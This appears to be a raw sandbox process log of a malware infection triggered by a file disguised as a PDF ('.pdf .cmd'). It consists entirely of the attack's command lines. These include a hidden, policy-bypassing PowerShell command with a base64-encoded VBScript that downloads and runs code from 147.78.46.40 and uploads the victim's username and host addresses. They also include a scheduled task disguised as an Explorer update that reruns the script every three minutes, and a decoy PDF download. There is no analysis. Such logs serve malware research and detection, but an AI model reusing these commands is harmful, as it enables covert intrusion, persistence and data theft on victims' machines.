cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "ntkaP" "C:\Users\test22\AppData\Local\Temp\481-5412-09.pdf .cmd"
2552cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\test22\AppData\Local\Temp\481-5412-09.pdf .cmd"
2624powershell.exe powershell.exe -w hidden -nop -noni -exec bypass -c $a='ZGltIHIsIGMNCnNldCByID0gY3JlYXRlb2JqZWN0KCJXU2NyaXB0LlNoZWxsIikNCmMgPSAicG93ZXJzaGVsbC5leGUgLWV4ZWN1dGlvbnBvbGljeSBieXBhc3MgLXcgaGlkZGVuIC1ub3Byb2ZpbGUgLWMgJGlpaz1uZXctb2JqZWN0IG5ldC53ZWJjbGllbnQ7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cDovLzE0Ny43OC40Ni40MDozNzY2Mi9SY2ViS1J2YWludlFub2VTL3BhZ2UzMTEvdXBncmFkZS50eHQnKTtpZigkZmxtLkxlbmd0aCAtZ3QgMSl7JGprcj1bc3lzdGVtLnRleHQuZW5jb2RpbmddOjp1dGY4LmdldFN0cmluZygkZmxtKTtpZigkamtyIC1tYXRjaCAnZ2V0LWNvbnRlbnQnKXtbYnl0ZVtdXSAkZHJweT1JRVggJGprcjt9ZWxzZXskYmpkbz13aG9hbWk7JGJqZG8rPSc9PSc7JGJqZG8rPVtTeXN0ZW0uTmV0LkRuc106OkdldEhvc3RBZGRyZXNzZXMoJGlwKStbU3lzdGVtLkVudmlyb25tZW50XTo6TmV3TGluZTskYmpkbys9SUVYICRqa3J8b3V0LXN0cmluZztbYnl0ZVtdXSRkcnB5PVtzeXN0ZW0udGV4dC5lbmNvZGluZ106OlV0ZjguR2V0Qnl0ZXMoJGJqZG8pO307JHVqaz1uZXctb2JqZWN0IG5ldC53ZWJjbGllbnQ7JHVqay51cGxvYWRkYXRhKCdodHRwOi8vMTQ3Ljc4LjQ2LjQwOjQzODkxL3BhZ2UzMTEnLCRkcnB5KTt9Ig0Kci5SdW4gYywgMCwgZmFsc2UNCg==';$b=[System.Convert]::FromBase64String($a);$c=[System.Text.Encoding]::utf8.GetString($b);set-content C:\\Users\\Public\\Libraries\\Libraries.vbs -value $c;schtasks.exe /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\\Users\\Public\\Libraries\\Libraries.vbs /f;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://147.78.46.40:37662/office/1.pdf');set-content "$home\\appdata\local\\temp\\481-5412-09.pdf" -value $flm -Encoding byte;
2712schtasks.exe "C:\Windows\system32\schtasks.exe" /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\\Users\\Public\\Libraries\\Libraries.vbs /f
2824